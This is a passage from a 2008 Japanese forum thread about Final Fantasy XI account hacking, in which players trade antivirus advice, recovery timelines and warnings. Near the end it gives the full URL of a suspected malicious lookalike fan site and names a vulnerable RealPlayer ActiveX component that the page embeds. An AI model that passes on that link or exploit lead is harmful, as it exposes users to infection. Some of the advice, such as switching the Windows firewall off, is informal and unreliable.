FF13商法のシリーズの一つが次世代MMOだったりしてw

372 名前:既にその名前は使われています:2008/09/13(土) 00:34:09 ID:qCglIX7j
>>370
ハイ、そんな所です。拙くて御免なさい。

373 名前:既にその名前は使われています:2008/09/13(土) 01:06:28 ID:ZRsMcFiw
おやすみage

374 名前:既にその名前は使われています:2008/09/13(土) 01:38:37 ID:+Z61/tOb
アプリケーション:LuComSever_3_4.EXE
送信先IP:60.254.130.24:HTTP
25280.ftp□download2□akadns
というところにアクセスしよとするのですが。これは大丈夫なのでしょうか?
何のプログラムがアクセスしようとしているのがわからないのが現状です(´・ω・`)
本日から急に発生しました。
最近インスコしたプログラムもないのになぁ…

375 名前:既にその名前は使われています:2008/09/13(土) 01:44:43 ID:5O7r5QnG
>>374
シマンテック製品のLiveUpdate関係っぽい

376 名前:既にその名前は使われています:2008/09/13(土) 01:52:52 ID:+Z61/tOb
>>375
即の回答ありがうございます。
たしかにパソコンにはノートンが入っております、ただ気になる点は…いままでこのようなアクセス要求がなかったため…

377 名前:既にその名前は使われています:2008/09/13(土) 01:56:41 ID:AegNeeiB
>>376
なにかほかにセキュリティに関係するソフトは入れませんでしたか?

378 名前:既にその名前は使われています:2008/09/13(土) 02:00:24 ID:GgE1Nccy
ノートンの自動更新によって、LiveUpdate関係に変更があったということではにぃのか

379 名前:既にその名前は使われています:2008/09/13(土) 02:07:43 ID:+Z61/tOb
>>377
ここ数日で追加したセキュリティーソフト関連等はありません(;´д`)
>>378
カスペオンラインで検索かけたところ現時点での結果は白でした…ノートンのアップデート方式が変更されただけなのかなぁ…この週末だけに、不安が(´・ω・`)

380 名前:既にその名前は使われています:2008/09/13(土) 02:27:46 ID:AegNeeiB
>>379
ファイアウォールの処理の仕方は自動(推奨)になっていますか?
判断できなければ自動にしておいたほうが無難ですよ

381 名前:既にその名前は使われています:2008/09/13(土) 02:41:59 ID:+Z61/tOb
>>380
ファイアウォールはウィンドウズとノートンにてオンになっております。
またノートンのホムペ閲覧しようとするとなぜかPGにて香港 中国が反応しちゃうのですが…(;´д`)


382 名前:既にその名前は使われています:2008/09/13(土) 02:52:28 ID:AegNeeiB
>>381

>>374の反応は、Windowsのほうでしてきた反応ですか?

↓シマンテックの日本語HP
ttp://www.symantec.com/ja/jp/index.jsp

中国IPを弾くのは、サポートかなにかにつなぎにいってませんか?
シマンテックのサポートは中国です(わたしもそれでかなり悩みました)

383 名前:既にその名前は使われています:2008/09/13(土) 03:06:53 ID:AegNeeiB
>>381
結論から言いますけど、LuComSever_3_4.EXEはノートン360のLiveUpdateだから
動作的には問題ないです↓

ttp://service1.symantec.com/SUPPORT/INTER/nisjapanesekb.nsf/0/49256b02002655fd49256b8e0043d791?OpenDocument

ファイアウォールはあまりいくつも立てると問題が起きますから、ノートンが
オンになっているのならWindowsのほうはオフにしたほうがいいと思います

慌てるより先にいろいろ出てきた情報をもとにして検索してみるとけっこう
答えはウェブに落ちているものですよ
落ち着いて探してみましょう
言葉をきつくして言いますけど、自分の環境を自分で把握できないようでは
セキュリティのセの字にもなりません

384 名前:既にその名前は使われています:2008/09/13(土) 06:54:42 ID:ofhyBUvM
age

385 名前:既にその名前は使われています:2008/09/13(土) 07:04:45 ID:rYN3tvtC
sage

386 名前:既にその名前は使われています:2008/09/13(土) 07:56:08 ID:tl+y3k8G
特に気にしていなかったセキュリティ
たまたまたどり着いたここを見てセキュリティ関連のソフトをいくつも入れた。
完璧なので狙ってここには来ない。
コンクリフトが発生するのでFFXIプレイ中は停止させることが多い。

今そんな奴が多数いるのだろうか。

387 名前:既にその名前は使われています:2008/09/13(土) 08:47:26 ID:Vl1LQu7i
>>370->>372
情報・解説ありがとう

ウィルスってのは「油断」じゃなくて
「もののはずみ」で感染するから
(うっかり添付ファイルを触ってしまった、その気も無いのにURLを踏んでしまった
普段からの注意喚起と対策が必要だぁね〜

388 名前:既にその名前は使われています:2008/09/13(土) 09:34:26 ID:+Z61/tOb
>>383
こんなページがあったなんて…自分でも探したつもりだたのに。ほんとありがとうございました。

389 名前:既にその名前は使われています:2008/09/13(土) 12:29:59 ID:de5c2sQ1
保守

390 名前:既にその名前は使われています:2008/09/13(土) 13:14:45 ID:kdH2Vpxf
※通報スレとのマルチポスト失礼

Kujata

白門で装備品バザーシャウトを繰り返しているSiloxというキャラクターが
ハックされたアカウントの可能性が高い。装備品を軒並みバザーしている。
GMコールにて本人確認を養成しているので、支援お願いします。


391 名前:既にその名前は使われています:2008/09/13(土) 14:13:43 ID:4FkV9d2y
>>386
どれくらいの量のソフトを常駐させておみえなのかわかりませんが
セキュリティ関係では6個常駐させていてコンクリフトの経験はありません
(セキュリティ以外にもいくつか常駐してます)

392 名前:既にその名前は使われています:2008/09/13(土) 16:07:13 ID:s2i1cQYz
age

393 名前:既にその名前は使われています:2008/09/13(土) 17:14:25 ID:mVnHsvAK
>>391
なにを併存させてるのかkwsk

394 名前:既にその名前は使われています:2008/09/13(土) 18:44:46 ID:OQfetrhO
やはりここはこれを貼るしか無かろう。

漏れはノートン、バスター、NOD32、Bitdefender,AVAST!常駐最強(´・ω・)ス

最初にバスターを入れれば複数いける(´・ω・)ス
普段は不具合ないけどウィルス発見したときすごいことになる(´・ω・)ス
ソフト同士で取り合いを起こす(´・ω・)ス
ノートン「とったどー! 隔離する(´・ω・)ス!」
バスター「(ノートンの隔離フォルダから)とったどー! 隔離する(´・ω・)ス!」
ノートン「(バスターの隔離フォルダから)また見つけたどー!」

って繰り返す(´・ω・)ス
テラバカ(´・ω・)ス

あとむちゃくちゃ重くなるから常用は無理(´・ω・)ス

395 名前:既にその名前は使われています:2008/09/13(土) 18:53:53 ID:dgWR6L9Z
>>394
それ初出いつだっけ、2年前?懐かしいのう

396 名前:既にその名前は使われています:2008/09/13(土) 18:57:22 ID:QPMUd2O4
山田ヲチスレっ(´・ω・) スカ

397 名前:既にその名前は使われています:2008/09/13(土) 19:03:44 ID:4FkV9d2y
>>393
一般的なものだけしか入れてませんけど・・・

んと、NIS2008・Spybot・Unleak・PG2・Windows defender・PSI
FF用PCとネット用PC、どちらも同じです

398 名前:393:2008/09/13(土) 19:07:13 ID:4FkV9d2y
Spyware Blasterは常駐じゃなかったと思うので除きました

399 名前:397:2008/09/13(土) 19:08:20 ID:4FkV9d2y
397だろおぃ>わたし

400 名前:既にその名前は使われています:2008/09/13(土) 19:18:01 ID:QPMUd2O4
カスペとノートン併存させたい

401 名前:既にその名前は使われています:2008/09/13(土) 20:53:49 ID:s2i1cQYz
mage

402 名前:既にその名前は使われています:2008/09/13(土) 21:20:04 ID:t1QzSPkj
山田ヲチスレ見てたなぁ、ダウソ板住人ではないがあれだけは楽しかったw

403 名前:既にその名前は使われています:2008/09/13(土) 22:07:04 ID:qCglIX7j
>>402
人の不幸は蜜の味、ですね。分かります。

404 名前:既にその名前は使われています:2008/09/13(土) 22:21:19 ID:t1QzSPkj
うむ
ジョブ板の暗黒スレに突撃したりとかな・・・w

405 名前:既にその名前は使われています:2008/09/13(土) 23:38:29 ID:4FkV9d2y
232からあげ

406 名前:既にその名前は使われています:2008/09/13(土) 23:45:37 ID:tl+y3k8G

うお!q!!
観戦しとる
http://www.playonline.com/ff11/download/wind/asx/live.asx

407 名前:既にその名前は使われています:2008/09/14(日) 00:38:37 ID:IyMbqSxr
おやすみ前のあげ。

408 名前:既にその名前は使われています:2008/09/14(日) 01:36:59 ID:hIiFn3Kn
>>327
レスありがとう。
全部のサイトでは無いけどやはり気になってしまう(´・ω・`)

409 名前:既にその名前は使われています:2008/09/14(日) 02:26:49 ID:gXM0WY+j
ほしゅして寝る

410 名前:既にその名前は使われています:2008/09/14(日) 03:18:13 ID:OWK9aplb
>>313
その動画の番号教えて。みてみたい。

411 名前:既にその名前は使われています:2008/09/14(日) 03:59:42 ID:CZe0gGnX
いきなりスレ数が170とかになってて焦った
ほしゅほしゅ

412 名前:既にその名前は使われています:2008/09/14(日) 04:18:01 ID:ydT79994
かすぺる入れてFF11やりはじめたんだけど
C:\Program Files\PlayOnline\SquareEnix\PlayOnlineViewer\pol.exe
でkeylogger警告してくるんだけど
これは許可だしちゃっていいのかな?

413 名前:既にその名前は使われています:2008/09/14(日) 06:10:26 ID:VguciVYr
>>412
それはいいよ許可して

そして別のセキュリティソフトに変えるといいよ

414 名前:既にその名前は使われています:2008/09/14(日) 07:05:19 ID:hmVnTC4f
セキュリティソフトとしてマカフィーの評価はどう?

デスクは360だが、ノートが360入れるとエラー多くて
デフォで入ってたマカフィー使ってるんだ。



保守揚げ

415 名前:既にその名前は使われています:2008/09/14(日) 07:14:00 ID:MozNiAjf
しばらく休止または引退していて復帰した浦島太郎ほど、垢ハックされやすい。
今のこの状況を知らないため、復帰したフレがいたらまず垢ハックのことを教えてやるべき。

416 名前:既にその名前は使われています:2008/09/14(日) 09:04:57 ID:fb7zNgqE
保守

新型には気をつけよう。

417 名前:既にその名前は使われています:2008/09/14(日) 09:19:29 ID:KyVXeDfj
最近報告少ないな   ちっとは沈静化したのだろうか

418 名前:既にその名前は使われています:2008/09/14(日) 09:20:41 ID:NUP/i1aL
んなことはない。
久々にフレからtellがきて、「垢ハックされてた;;」報告とかあるし。

419 名前:既にその名前は使われています:2008/09/14(日) 09:24:26 ID:nJpLIqr2
>>397
普通こういうスレで併用が問題になるのは
>>394のコピペみたいに同じ系統(コピペの場合はウィルスに対する常駐保護)のソフトを複数同時に動かしたときのことだよ。
>>397のはそれぞれがやってる処理がほとんどかぶってないから問題が起きないんじゃないかな。

まあそもそもの始まりの>>386は、
導入してもゲーム中OFFにしちゃうやつもいるのかなぁ、っていう程度の想像の話しみたいけどな。

420 名前:既にその名前は使われています:2008/09/14(日) 10:02:06 ID:VguciVYr
俺の周りでは一部機能をOFFするてのを聞いた
あれはその類かもしれないなぁ一部OFFって言ってたから多少は理解している人間だろうけど


421 名前:既にその名前は使われています:2008/09/14(日) 10:04:17 ID:I6YtxuzT
知識がないヤツは金を使え、金がないヤツは知識を使え。
両方無いヤツは勉強して知識を身につけろ。

422 名前:既にその名前は使われています:2008/09/14(日) 11:12:44 ID:UIVsQJkY
レジストリエディタでwzcsvbxm.dllが見つかった場合は
OS毎クリーンインストールしなきゃダメなんですかね?

423 名前:既にその名前は使われています:2008/09/14(日) 11:31:27 ID:xlwoS+MD
また検索履歴か

424 名前:既にその名前は使われています:2008/09/14(日) 12:01:32 ID:doq0d6fN
昼飯前にage

425 名前:既にその名前は使われています:2008/09/14(日) 13:39:44 ID:isA2NaFx
POLID登録時未成年だったので年齢詐称

8/17 垢ハック
8/17 凍結
8/18 復旧依頼&書類郵送
8/20 書類受理→データと違うので復旧できませんとメール
8/21 サポセンを問い詰める→本人確認できたので引き続き復旧します
9/14 巻き戻し完了メール

パス変更、復旧以来のときにも生年月日のことを聞かれててGMの方が訂正しときます的なことを
言ってたのですが、訂正されてなくてちょっと困ったぜ




426 名前:既にその名前は使われています:2008/09/14(日) 14:08:07 ID:0O4gWDXB
やっと復旧完了メールきたああああああ!!!!
日曜に来るとは想定外だったぜ!

427 名前:既にその名前は使われています:2008/09/14(日) 14:15:23 ID:OOrf5cp+
>>426
       ____
     /      \
   /  _ノ  ヽ、_  \
  /  o゚⌒   ⌒゚o  \  派遣だから3連休なのに休み無しで頑張ってるお
  |     (__人__)    |  
  \     ` ⌒´     /

428 名前:既にその名前は使われています:2008/09/14(日) 14:45:56 ID:NdxGiopy
ありゃ、巻き戻し報告スレ落ちちゃったか・・・

429 名前:既にその名前は使われています:2008/09/14(日) 16:31:17 ID:UIVsQJkY
422で書き込みしたものですが
最近POL起動してインしようとすると2回ほど強制終了して
その後インできるんですが、これは危険ですよね?

430 名前:既にその名前は使われています:2008/09/14(日) 16:33:51 ID:yOpBXy2w
きけんだよー

431 名前:既にその名前は使われています:2008/09/14(日) 16:34:14 ID:H034iIa3
>>429
それなら最初からそう書くべし。422のレス内容だけじゃ端的すぎて
何もアドバイスできないよ。
恐らく感染してもうパスも中華に握られてるだろうから。
安全なハードからパス変更するかGMに頼んで垢凍結してもらってから
クリーンインストール推奨。

432 名前:既にその名前は使われています:2008/09/14(日) 16:44:44 ID:UIVsQJkY
なるほど。
OSをクリーンインストールしてその後パス変えるとかじゃダメかな?
今はインできてるもんで。

433 名前:既にその名前は使われています:2008/09/14(日) 16:46:21 ID:doq0d6fN
インしてる状態ならPS2とかのリアフレとかにパス変更をお願いするのがえぇんじゃないか?
クリーンインスコしてからじゃ間に合わないかも

434 名前:既にその名前は使われています:2008/09/14(日) 16:46:59 ID:H034iIa3
>>432
クリンスコ>各種ドライバインスコ>FFインスコ>パッチDLの間に
ハックされる可能性があることを認識した上でNGかOKかは自分で判断しる

435 名前:既にその名前は使われています:2008/09/14(日) 16:59:48 ID:UIVsQJkY
勉強になるます
んでは垢凍結してもらい、>>434の作業していけば安全なんですな

つかどっから潜り込んだんだ・・

436 名前:既にその名前は使われています:2008/09/14(日) 17:01:35 ID:yvY+UhpV
ギアス実況はじまったから保守

437 名前:既にその名前は使われています:2008/09/14(日) 18:12:48 ID:iL/a2PPU
>425
POLは未成年でも「親権者の承諾をとってプレイする本人の名義で契約しろ」って
マニュアルにも書いてあるんだが。Q&Aにもあったかな。
カード支払いも、カード名義人と契約者別でできる。
マニュアルとか全く読まずに勝手に行動する人なんだろうね。
そんでサポセン問い詰めるとかバカなの?

438 名前:既にその名前は使われています:2008/09/14(日) 18:50:14 ID:H0KSdHqI
落ちすぎだろ

439 名前:既にその名前は使われています:2008/09/14(日) 18:51:49 ID:H034iIa3
>>435
感染してたってことはセキュリティが甘いってことだから、
クリンスコしたら無料の体験版でもいいからアンチウイルスソフト導入しなよ

440 名前:既にその名前は使われています:2008/09/14(日) 20:51:27 ID:RmCtMMQW
ageなきゃいけない!

441 名前:既にその名前は使われています:2008/09/14(日) 23:09:22 ID:mZgdUS4q
age

442 名前:既にその名前は使われています:2008/09/14(日) 23:12:21 ID:O2PWbSoI
ほんとピーク時に比べたら、のびなくなったなー

今のところは沈静してるのかねー

443 名前:既にその名前は使われています:2008/09/15(月) 00:01:14 ID:6x2yv8jo
Flash対策している人にとっては落ち着いた状況と言っていいとは思うけどね
こうなると次のがきそうだから全然安心はできないけどさw

444 名前:既にその名前は使われています:2008/09/15(月) 00:10:54 ID:pnU3SrDm
寝る前にage
このまま沈静化するといいのにね〜

445 名前:既にその名前は使われています:2008/09/15(月) 00:18:52 ID:G0PQciXA
>>433
6月、8月ときたから10月あたりに
本命は正月休み前がかなり危ないと思われ

446 名前:既にその名前は使われています:2008/09/15(月) 00:36:07 ID:iq7PCban
IQ7のPCはもれなくBAN

447 名前:既にその名前は使われています:2008/09/15(月) 00:47:43 ID:OZp+lgoq
垢ハックされた場合、大体ワールド変えられてるから3000円負担しなきゃ
いけないって知ってた?


448 名前:既にその名前は使われています:2008/09/15(月) 00:48:54 ID:4w67+cK9
そりゃこれだけ騒がれてるのに
自分だけは大丈夫とおもってるカード支払い組みだろ


449 名前:既にその名前は使われています:2008/09/15(月) 00:53:59 ID:OZp+lgoq
カードだろうが、何だろうが請求されるんだよ。
翌月払えって。

450 名前:既にその名前は使われています:2008/09/15(月) 01:39:16 ID:JzfsNQxk
FFでクレカとか激やばだろw
近いうちに主要カード会社とか抜けるくらいの勢いだろこれ

451 名前:既にその名前は使われています:2008/09/15(月) 01:40:02 ID:HLV9QG74
おやすみ前のあげ。

452 名前:既にその名前は使われています:2008/09/15(月) 02:20:55 ID:h4eDAp78
age

453 名前:既にその名前は使われています:2008/09/15(月) 02:28:18 ID:Ba54bD5V
■アカウントハックされた奴は最寄の警察に行って被害届けを出そう!
 不正アクセスに増加に伴い親身になって対応してくれるようになったぞ!

※最近業者が行っても無駄だの馬鹿にされるだの
  逮捕されないために必死になってるので注意!

警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。

警視庁サイバー対策室
http://www.npa.go.jp/cyber/

各都道府県警では既に不正アクセスに関する専門の対策室ができております
泣き寝入りは絶対ダメ!お気軽にご相談を。
http://www.npa.go.jp/cyber/localpolice/index.html

454 名前:既にその名前は使われています:2008/09/15(月) 03:10:12 ID:h4eDAp78
age

455 名前:既にその名前は使われています:2008/09/15(月) 05:43:47 ID:6xVaA7/W
あげ

456 名前:既にその名前は使われています:2008/09/15(月) 07:22:26 ID:OZp+lgoq
>>450
クレジットカードの情報はアカウント情報とは別物。
それが抜けたらカード会社が危ういだろうな。

逆にクレジットカードなど、本人確認が取れないとアカウントが取得
できない仕組みにしたほうが良い。業者が仮アカウントを取得できないように。

>>454
外人相手にどこまで有効なんだか。。。

中国はアク禁かつサービス終了にしたほうが良いだろな。


457 名前:既にその名前は使われています:2008/09/15(月) 08:22:42 ID:YNwF0icz
>>450
それ言ったらインターネットでクレカとか、アルバイトの店員のいる店でクレカの方がよっぽどヤバい。

それに普通はクレカが不正使用された場合クレカ会社が負担する。
FF11の場合が該当するかどうかは微妙な気がするが。

458 名前:既にその名前は使われています:2008/09/15(月) 10:03:54 ID:OZp+lgoq
Tr●jan-GameThief.Win32.OnLineGames.taru
に感染してた。これ新しいよね。
パターン出て間もなくスキャンも出来てないときや、パターン出る前に感染した
としても、被害者にユーザIDとパスワードの管理が行き届いてないから、
移転費などはご負担下さいって姿勢はどうなのかな。
長い眼で見たら大きなマイナスになると思うけど。
被害者の立場にたって考えてほしい。

459 名前:既にその名前は使われています:2008/09/15(月) 10:21:24 ID:16opgDNs
>>458
被害者の立場に立ったらコスト上がって困るじゃないですか^^;

実際ここ最近のユーザーフレンドリィなver.upって根幹には
サービス開始6年目ってのも大きいだろうけれど課金者が減ってしまったからだろう。

スクエニの運営スタイルからすると問題が大きくなってから対処すればいい、ッてのは
オフゲに於いてもゲーム進行が止まる様なバグがあっても回収しない事があるのを見ると
よく分かると思うので、もっと被害者が増えないと何も変わらないと思う。

少なくとも和田社長は株式会社の社長の鏡の様に株主の言う事は絶対、ッて人だから
株主が守銭奴であるせいだ、とも言えると思う。

最も和田社長だからこそ守銭奴的な株主が増えたのだと思うけれど。

460 名前:既にその名前は使われています:2008/09/15(月) 11:02:57 ID:obvUZ7hi
tp://marimo●s137●xrea●com/r.cgi/ff11/maptool

さっき間違えて踏んでしまったんだがここってやばかったんだっけ?
FireFox+NoScript+PGなんだが

461 名前:既にその名前は使われています:2008/09/15(月) 11:42:00 ID:8pDXPvDY
>>458
既出。XREAトロイの17世代目。
先月31日製造、同日各社に提出済み。
ttp://www.virustotal.com/analisis/b5f8fdfcde0e42a1346bf092ada24d27

462 名前:既にその名前は使われています:2008/09/15(月) 11:43:42 ID:8pDXPvDY
>>460
そのページには何もない。鑑定は他所でどうぞ。

ネットワーク
http://pc11.2ch.net/hack/
勇気がなくて踏めない人のための鑑定スレPart18
http://pc11.2ch.net/test/read.cgi/hack/1208760889/

463 名前:既にその名前は使われています:2008/09/15(月) 12:04:13 ID:jqfBYEy/
オンラインゲーム=RMTプレイメイン
が一番いいという風に育てた世代だろうしなぁ
よくある話というか・・・


464 名前:既にその名前は使われています:2008/09/15(月) 12:06:07 ID:OZp+lgoq
>>459
今は20万ユーザくらいなのかな?
年間48億くらい?
コスト減できるような対策ツールの充実が急務では。
次に繋げる為にも、セキュリティ面での落度は致命的。


465 名前:既にその名前は使われています:2008/09/15(月) 12:44:27 ID:EjFoK+ZS
延々と続いてるハック問題に強い事言える監査組織が無いのが問題
緑川さん立ち上げてくださいおながいします

466 名前:既にその名前は使われています:2008/09/15(月) 13:14:01 ID:8pDXPvDY
まずソースネクストみたいなザルを発禁にしてくれ

467 名前:既にその名前は使われています:2008/09/15(月) 14:14:15 ID:g2XolT8h
>>460
感染する仕組みをちゃんと理解しておくことが必要ですね

468 名前:既にその名前は使われています:2008/09/15(月) 16:24:30 ID:8pDXPvDY
とりあえずage

469 名前:既にその名前は使われています:2008/09/15(月) 18:02:57 ID:bJLcsSba
あげ

470 名前:既にその名前は使われています:2008/09/15(月) 19:49:21 ID:3YCCFRFY
巻き戻し対応遅すぎ。

471 名前:既にその名前は使われています:2008/09/15(月) 20:43:21 ID:djf5rwaD
あげ

472 名前:既にその名前は使われています:2008/09/15(月) 22:24:39 ID:Yuxb5Grn
278からの急上昇

473 名前:既にその名前は使われています:2008/09/15(月) 23:01:23 ID:OWrRGEdy
腰痛がひどい

474 名前:既にその名前は使われています:2008/09/15(月) 23:36:43 ID:HLV9QG74
おやすみ前のあげ。

475 名前:既にその名前は使われています:2008/09/16(火) 00:10:49 ID:60f40Z51
オヤスミのあげ

476 名前:既にその名前は使われています:2008/09/16(火) 01:45:25 ID:MXdIBTfY
おやすみ

477 名前:既にその名前は使われています:2008/09/16(火) 02:36:12 ID:xYBz+wAQ
巻き戻し報告スレが落ちちゃったので、
一応まだ復旧されてない方へのご参考までに報告します。
8/31不正アクセス
8/31垢凍結
9/1 チャットサポートでPW再発行→キャラ確認※身包み剥がされてました
9/1 キャラデータ復元依頼と公的書類送付
9/15キャラデータ復元
備考:レベは1、2ヶ月分くらい巻き戻ってました。
アイテムについてはエクレアでも戻ってこなかったものがありました。

478 名前:既にその名前は使われています:2008/09/16(火) 05:41:53 ID:wuQM/6PG
200からあげ


479 名前:既にその名前は使われています:2008/09/16(火) 08:19:25 ID:uea+W7Wz
IPアドレスからサーバー所在地調べてくれるサイトってどこだっけ?

480 名前:既にその名前は使われています:2008/09/16(火) 08:25:44 ID:DQv/X8Z7
どこだっけ じゃなくて どこでしょうか、教えていただけませんか? だろ。

社会人になって勉強して来いあほニート

481 名前:既にその名前は使われています:2008/09/16(火) 08:26:03 ID:38dI1GeH
JP NICとかInter NIC?それともwww.aguse.jpの方かな?

482 名前:既にその名前は使われています:2008/09/16(火) 10:32:00 ID:7yHOD3e0
>>480のほうが無礼に見える件。

483 名前:既にその名前は使われています:2008/09/16(火) 13:35:19 ID:DeEPkQuf
258からあげくん

484 名前:既にその名前は使われています:2008/09/16(火) 13:46:12 ID:AIGhpq8c
IPひろば使ってたぜ

485 名前:既にその名前は使われています:2008/09/16(火) 15:30:37 ID:+2UuDuJD
200さるべーじ

486 名前:既にその名前は使われています:2008/09/16(火) 17:23:33 ID:yohkazVm
あげ

487 名前:既にその名前は使われています:2008/09/16(火) 17:28:15 ID:5raphCCB
>>477
時系列がほぼ同じだw
まだ復旧連絡はまだ着ていないけど。

488 名前:既にその名前は使われています:2008/09/16(火) 17:37:11 ID:h97MwBUn
>>477
それってもしかして
被害確認以前にアクセスあったのかもよ
俺の場合不正直前ぽかった

489 名前:既にその名前は使われています:2008/09/16(火) 17:43:03 ID:j0LmKQv/
パス抜かれて業者に課金されてたの見つけた
こわいな
http://www.nicovideo.jp/watch/sm4573634

490 名前:既にその名前は使われています:2008/09/16(火) 19:02:11 ID:WZfcViO0
age

491 名前:既にその名前は使われています:2008/09/16(火) 20:09:28 ID:MXdIBTfY
数日前からPG2のリスト
http://peerguardian○sourceforge○net/lists/spy○phpとかが
URL接続エラーで更新できないんだけど
なんでかな

492 名前:既にその名前は使われています:2008/09/16(火) 20:30:41 ID:+2UuDuJD
>>491
公式のリストは結構エラー出るよ
ただ俺は使ってないから今回もそれが原因なのかは分からんけど

493 名前:既にその名前は使われています:2008/09/16(火) 20:52:39 ID:GJf0jDtU
本人確認と不正アクセスの事実が把握できたなら、すぐに復元してくれれば
良いのに。
時間かかりすぎ。

494 名前:既にその名前は使われています:2008/09/16(火) 21:07:05 ID:XYusCqmS
オンラインゲームもしょせん、RMTツールでしかないからな

つ記事:オンラインゲームはRMTの宝庫

495 名前:既にその名前は使われています:2008/09/16(火) 21:10:06 ID:MyHJ6T2X
×ハック
○クラック

細かいが

496 名前:既にその名前は使われています:2008/09/16(火) 21:29:41 ID:+2UuDuJD
NoScriptきてるぞー

497 名前:既にその名前は使われています:2008/09/16(火) 21:49:35 ID:YMSBRtF0
>>493
認証担当が毎週火曜日だけの出社だから無理

498 名前:既にその名前は使われています:2008/09/16(火) 21:52:59 ID:GJf0jDtU
>>497
そうなの?
ひどいな、それ。

499 名前:既にその名前は使われています:2008/09/16(火) 21:56:17 ID:h97MwBUn
>>497
どこ情報だよw

500 名前:既にその名前は使われています:2008/09/17(水) 00:02:31 ID:DeEPkQuf
あげまふ。起きたら落ちてそうなヤカン

501 名前:491:2008/09/17(水) 00:07:47 ID:XMwhEY3y
>>492
そなのかあ
ありがとう
しばらく様子見てみますage

502 名前:既にその名前は使われています:2008/09/17(水) 00:08:11 ID:XMwhEY3y
あげてなかったage

503 名前:既にその名前は使われています:2008/09/17(水) 00:14:24 ID:VmtHz319
おやすみ前のあげ。

504 名前:既にその名前は使われています:2008/09/17(水) 00:19:43 ID:ZA1hWmTn
※※各種ソフトウェアアップデート情報※※

NoScript 1.8.1 アップデート

505 名前:既にその名前は使われています:2008/09/17(水) 01:49:43 ID:PkKZ+Fpy
あげ

506 名前:既にその名前は使われています:2008/09/17(水) 01:57:07 ID:EOzNtDCb
>>504
更新した
ありがとん

507 名前:既にその名前は使われています:2008/09/17(水) 02:40:57 ID:ZA1hWmTn
しゅ

508 名前:既にその名前は使われています:2008/09/17(水) 03:41:10 ID:ZA1hWmTn
しゅしゅ

509 名前:既にその名前は使われています:2008/09/17(水) 03:50:14 ID:5AzQPvbp
さっき、他スレで「FF11ヴァナ・ディール菜園」を踏んだらavastがマルウェアを見つけた
敢えてURLを張らないけど気を付けてね
只今カスペオンラインスキャン中

510 名前:既にその名前は使われています:2008/09/17(水) 04:03:53 ID:rkqJGY7W
>>509
カスペじゃ異常検知しないね。
誤検知かもしれないし、Avast!も最近飛躍的に検知率がよくなってるから
ひょっとしてAvast!の方が正いのかもしれない。

ところでAvast!が見つけたマルウェアの名前はなんですか?

511 名前:既にその名前は使われています:2008/09/17(水) 04:04:25 ID:RNuwTKwE
>>509
見てきたがそれらしいスクリプトはないぞ?
見つけたマルウェアは何?

512 名前:既にその名前は使われています:2008/09/17(水) 04:10:15 ID:5AzQPvbp
こんなの
"JS:Agent-AU [Expl]"
"http://www.geocities.jp/ff11seeds/Atlas/re11.htm\unp238426583"

ちなみにここ
グラがかっこいいと思う装備
http://changi.2ch.net/test/read.cgi/ogame/1221573964/91

91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
栽培サイト:FF11ヴァナ・ディール菜園 
http://www.geocities.jp/ff11seeds/index.html



513 名前:既にその名前は使われています:2008/09/17(水) 04:10:36 ID:ZA1hWmTn
危ないスクリプト、見つかりませんね<FF11ヴァナ・ディール菜園
スクリプトはいくつか入ってますけど、問題ないスクリプトしか
見当たりません

514 名前:既にその名前は使われています:2008/09/17(水) 04:13:22 ID:5AzQPvbp
もしかして俺の勘違い?
俺の恥で済むからかまわないけど

515 名前:既にその名前は使われています:2008/09/17(水) 04:15:47 ID:RNuwTKwE
どっちにしても直リンはやめれ

516 名前:既にその名前は使われています:2008/09/17(水) 04:16:17 ID:EVmfXFVx
脈絡もなしに菜園URLとか張ってるのはちょっと怪しいけどなあ

517 名前:既にその名前は使われています:2008/09/17(水) 04:16:35 ID:5AzQPvbp
あ、やっぱまずかった?
削除依頼って通じるかな?

518 名前:既にその名前は使われています:2008/09/17(水) 04:17:25 ID:ZA1hWmTn
>>512のリンク、先生が攻撃拒否しました

91 名前:既にその名前は使われています[] 投稿日:2008/09/17(水) 03:33:14 ID:1ooFqkW2
栽培サイト:FF11ヴァナ・ディール菜園 
ttp://www●geocities.jp/ff11seeds/index●html

このURLでなにか引っかかってます


519 名前:既にその名前は使われています:2008/09/17(水) 04:21:33 ID:5AzQPvbp
削除依頼って何処でお願いしたら良いんでしょう?
何分初めてなものでして

520 名前:既にその名前は使われています:2008/09/17(水) 04:23:56 ID:ZA1hWmTn
おかしいな・・・

geocities.jpからの侵入攻撃って、なんだろ・・・
202●93.87.154 ← 普通にヤフーのIPだし

521 名前:既にその名前は使われています:2008/09/17(水) 04:26:27 ID:5N8y1SS0
菜園踏んだらavastが2種類叫んだよ

VBS:Malware-gen
ウイルス/ワーム
080915-0, 2008/09/15

JS:Agent-AU [Expl]
Exploit
080915-0, 2008/09/15

522 名前:既にその名前は使われています:2008/09/17(水) 04:30:04 ID:uz4igdJy
『栽培サイト:FF11ヴァナ・ディール菜園』
ここウィルス警報発令ですか?

523 名前:既にその名前は使われています:2008/09/17(水) 04:31:59 ID:ZA1hWmTn
ttp://www●geocities.jp/ff11seed/ ← ヤフー検索で出たURL(とくに問題なし)

ttp://www●geocities.jp/ff11seeds/index●html ← >>512の出したURL(先生が侵入感知)

これって、なんだろ・・・

真似た罠サイト?とかだったりする?

524 名前:既にその名前は使われています:2008/09/17(水) 04:34:55 ID:8dOBeT1H
また一段とずる賢くなったな

525 名前:既にその名前は使われています:2008/09/17(水) 04:36:35 ID:rkqJGY7W
re11.htmのスクリプトちゃんと読んでないけど、 fuckyoukaspersky とか書いてるから超怪しい。

後、このページに含まれてる

clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93

これはRealPlayerで、脆弱性がある。
リアルプレイヤーを入れてなければ害はないはずだけど。

526 名前:既にその名前は使われています:2008/09/17(水) 04:40:19 ID:ZA1hWmTn
>>521
踏んだのは seeeds/indexのほうですよね?
seedのほうはスクリプト数4個で、seedsのほうは20個もある

527 名前:既にその名前は使われています:2008/09/17(水) 04:41:24 ID:QceLOnyf
しょこたんがノートンファイターと競演――ノートン 2009イベント
http://itpro.nikkeibp.co.jp/article/NEWS/20080916/314936/

なんでこんな変なイベントするんだろう・・・

528 名前:既にその名前は使われています:2008/09/17(水) 04:41:25 ID:uz4igdJy
ファッキューですとw

529 名前:既にその名前は使われています:2008/09/17(水) 04:44:38 ID:RNuwTKwE
菜園はttp://www●geocities●jp/ff11seed/index●htmlが正しいはず

